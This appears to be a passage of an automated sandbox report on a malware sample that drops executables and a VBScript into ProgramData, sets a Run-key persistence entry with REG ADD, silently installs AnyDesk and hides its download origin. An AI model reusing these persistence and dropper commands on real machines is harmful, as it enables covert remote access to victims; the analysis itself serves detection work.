                                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                Source: SysrI6zSkJ.exeReversingLabs: Detection: 39%
                                Source: AnyDesk.exeString found in binary or memory: Removed multi-install failure key; switching to channel:
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeFile read: C:\Users\user\Desktop\SysrI6zSkJ.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\SysrI6zSkJ.exe C:\Users\user\Desktop\SysrI6zSkJ.exe
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\embedded.exe
                                Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\p.vbs
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\WinNet\embedded.exe C:\ProgramData\WinNet\embedded.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs"
                                Source: C:\ProgramData\WinNet\embedded.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe
                                Source: C:\ProgramData\WinNet\embedded.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\AnyDesk.exe
                                Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\WinNet\embedded.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\p.vbs
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\WinNet\gg.exe "C:\ProgramData\WinNet\gg.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\WinNet\AnyDesk.exe C:\ProgramData\WinNet\AnyDesk.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\WinNet\gg.exe "C:\ProgramData\WinNet\gg.exe"
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess created: C:\ProgramData\WinNet\AnyDesk.exe "C:\ProgramData\WinNet\AnyDesk.exe" --local-service
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess created: C:\ProgramData\WinNet\AnyDesk.exe "C:\ProgramData\WinNet\AnyDesk.exe" --local-control
                                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                Source: unknownProcess created: C:\ProgramData\WinNet\gg.exe "C:\ProgramData\WinNet\gg.exe"
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exeJump to behavior
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\embedded.exeJump to behavior
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\p.vbsJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\WinNet\embedded.exe C:\ProgramData\WinNet\embedded.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" Jump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exeJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\AnyDesk.exeJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\p.vbsJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\WinNet\gg.exe "C:\ProgramData\WinNet\gg.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\WinNet\AnyDesk.exe C:\ProgramData\WinNet\AnyDesk.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs"
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess created: C:\ProgramData\WinNet\AnyDesk.exe "C:\ProgramData\WinNet\AnyDesk.exe" --local-serviceJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess created: C:\ProgramData\WinNet\AnyDesk.exe "C:\ProgramData\WinNet\AnyDesk.exe" --local-controlJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\WinNet\gg.exe "C:\ProgramData\WinNet\gg.exe"
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeWindow found: window name: SysTabControl32Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeAutomated click: OK
                                Source: C:\ProgramData\WinNet\gg.exeAutomated click: OK
                                Source: C:\ProgramData\WinNet\gg.exeAutomated click: OK
                                Source: C:\ProgramData\WinNet\gg.exeAutomated click: OK
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: SysrI6zSkJ.exeStatic PE information: More than 302 > 100 exports found
                                Source: SysrI6zSkJ.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                                Source: SysrI6zSkJ.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                Source: SysrI6zSkJ.exeStatic file information: File size 21906944 > 1048576
                                Source: SysrI6zSkJ.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x29d000
                                Source: SysrI6zSkJ.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x105200
                                Source: SysrI6zSkJ.exeStatic PE information: Raw size of snapshot is bigger than: 0x100000 < 0x110e600
                                Source: SysrI6zSkJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: SysrI6zSkJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: SysrI6zSkJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: SysrI6zSkJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: SysrI6zSkJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: SysrI6zSkJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: SysrI6zSkJ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: SysrI6zSkJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-64\privacy_feature\privacy_feature.pdb source: AnyDesk.exe, 00000010.00000002.2885333394.00000000012CA000.00000004.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000030E2000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-64\win_dwm\win_dwm.pdb source: AnyDesk.exe, 00000010.00000002.2885333394.00000000012CA000.00000004.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.0000000003044000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\b\s\w\ir\x\w\sdk\out\ReleaseX64\dart_precompiled_runtime_product.exe.pdb source: SysrI6zSkJ.exe, 00000000.00000000.1626990978.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2892782013.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2888383971.00000231DAA00000.00000004.00001000.00020000.00000000.sdmp, embedded.exe, 00000007.00000000.1634535755.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp, embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\app-32\win_app\win_app.pdb source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-32\win_dwm\win_dwm.pdb source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2885333394.000000000128E000.00000004.00000001.01000000.00000008.sdmp
                                Source: Binary string: SAS.pdbR source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2885333394.000000000128E000.00000004.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-32\privacy_feature\privacy_feature.pdb source: AnyDesk.exe, 00000010.00000002.2885333394.00000000012CA000.00000004.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.0000000003044000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: SAS.pdb source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2885333394.000000000128E000.00000004.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\app-32\win_loader\AnyDesk.pdb source: AnyDesk.exe, 00000010.00000002.2886245081.0000000001473000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\b\s\w\ir\x\w\sdk\out\ReleaseX64\dart_precompiled_runtime_product.exe.pdbd source: SysrI6zSkJ.exe, 00000000.00000000.1626990978.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2892782013.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2888383971.00000231DAA00000.00000004.00001000.00020000.00000000.sdmp, embedded.exe, 00000007.00000000.1634535755.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp, embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp
                                Source: SysrI6zSkJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: SysrI6zSkJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: SysrI6zSkJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: SysrI6zSkJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: SysrI6zSkJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                Data Obfuscation

                                barindex
                                Detected unpacking (changes PE section rights)
                                Source: C:\ProgramData\WinNet\AnyDesk.exeUnpacked PE file: 16.2.AnyDesk.exe.230000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                                Source: C:\ProgramData\WinNet\AnyDesk.exeUnpacked PE file: 19.2.AnyDesk.exe.230000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                                Source: C:\ProgramData\WinNet\AnyDesk.exeUnpacked PE file: 20.2.AnyDesk.exe.230000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                                Yara detected EXE embedded in BAT file
                                Source: Yara matchFile source: SysrI6zSkJ.exe, type: SAMPLE
                                Source: Yara matchFile source: C:\ProgramData\WinNet\embedded.exe, type: DROPPED
                                Source: gg.exe.0.drStatic PE information: 0xAEA20DC3 [Sat Nov 4 08:52:19 2062 UTC]
                                Source: SysrI6zSkJ.exeStatic PE information: section name: _RDATA
                                Source: SysrI6zSkJ.exeStatic PE information: section name: snapshot
                                Source: embedded.exe.0.drStatic PE information: section name: _RDATA
                                Source: embedded.exe.0.drStatic PE information: section name: snapshot
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeCode function: 0_2_00000231DA957EDC push ecx; ret 0_2_00000231DA958045
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeCode function: 0_2_00000231DA960274 push cs; retf 0003h0_2_00000231DA960277
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeCode function: 0_2_00000231DA95627C push esp; ret 0_2_00000231DA95633E
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeCode function: 0_2_00000231DA958048 push ecx; ret 0_2_00000231DA9581A6
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeCode function: 0_2_00000231DA9581A8 push ecx; ret 0_2_00000231DA9582F1
                                Source: C:\ProgramData\WinNet\embedded.exeCode function: 7_2_000001A0BB550048 push ecx; ret 7_2_000001A0BB5501A6
                                Source: C:\ProgramData\WinNet\embedded.exeCode function: 7_2_000001A0BB54FEDC push ecx; ret 7_2_000001A0BB550045
                                Source: C:\ProgramData\WinNet\embedded.exeCode function: 7_2_000001A0BB5501A8 push ecx; ret 7_2_000001A0BB5502F1
                                Source: C:\ProgramData\WinNet\embedded.exeCode function: 7_2_000001A0BB558274 push cs; retf 0003h7_2_000001A0BB558277
                                Source: C:\ProgramData\WinNet\embedded.exeCode function: 7_2_000001A0BB54E27C push esp; ret 7_2_000001A0BB54E33E
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_065A3B4F push 18093C5Dh; ret 18_2_065A401D
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_065A42D9 pushad ; ret 18_2_065A42DD
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_065A4B11 pushfd ; retf 18_2_065A4B12
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C2FCD0 push ecx; mov dword ptr [esp], 00000000h19_2_69C2FCD7
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C411DF push ecx; ret 19_2_69C411F2
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C41676 push ecx; ret 19_2_69C41689
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063FFE68 push eax; retf 24_2_063FFE69
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_063FEFC0 push es; ret 24_2_063FF0A0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065F1EF0 push esp; ret 24_2_065F1FF1
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065FB920 push es; retn 0004h24_2_065FBE50
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065F82E0 push es; retn 0004h24_2_065F82F0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065F82A0 push es; retn 0004h24_2_065F82B0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065F1151 push es; ret 24_2_065F1160
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065F8170 push es; retn 0008h24_2_065F8180
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065F81A0 push es; retn 0004h24_2_065F8290
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065F2E40 push es; retn 0004h24_2_065F2E50
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065F6A71 push es; ret 24_2_065F6A80
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065F3AD7 push ebx; retf 24_2_065F3ADA
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065F6A90 push es; ret 24_2_065F6AA0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065F6AB0 push es; ret 24_2_065F6AC0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 24_2_065FEB12 push es; ret 24_2_065FEB20

                                Persistence and Installation Behavior

                                barindex
                                Uses cmd line tools excessively to alter registry or file data
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: reg.exe
                                Source: C:\ProgramData\WinNet\embedded.exeProcess created: reg.exe
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: reg.exeJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeProcess created: reg.exeJump to behavior
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeFile created: C:\ProgramData\WinNet\embedded.exeJump to dropped file
                                Source: C:\ProgramData\WinNet\AnyDesk.exeFile created: C:\Users\user\AppData\Local\Temp\gcapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeFile created: C:\ProgramData\WinNet\gg.exeJump to dropped file
                                Source: C:\ProgramData\WinNet\AnyDesk.exeFile created: C:\ProgramData\WinNet\gcapi.dllJump to dropped file
                                Source: C:\ProgramData\WinNet\embedded.exeFile created: C:\ProgramData\WinNet\AnyDesk.exeJump to dropped file
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeFile created: C:\ProgramData\WinNet\embedded.exeJump to dropped file
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeFile created: C:\ProgramData\WinNet\gg.exeJump to dropped file
                                Source: C:\ProgramData\WinNet\AnyDesk.exeFile created: C:\ProgramData\WinNet\gcapi.dllJump to dropped file
                                Source: C:\ProgramData\WinNet\embedded.exeFile created: C:\ProgramData\WinNet\AnyDesk.exeJump to dropped file
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RepositoryJump to behavior
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RepositoryJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Hides that the sample has been downloaded from the Internet (zone.identifier)
                                Source: C:\ProgramData\WinNet\AnyDesk.exeFile opened: C:\ProgramData\WinNet\AnyDesk.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C403B7 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_69C403B7
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
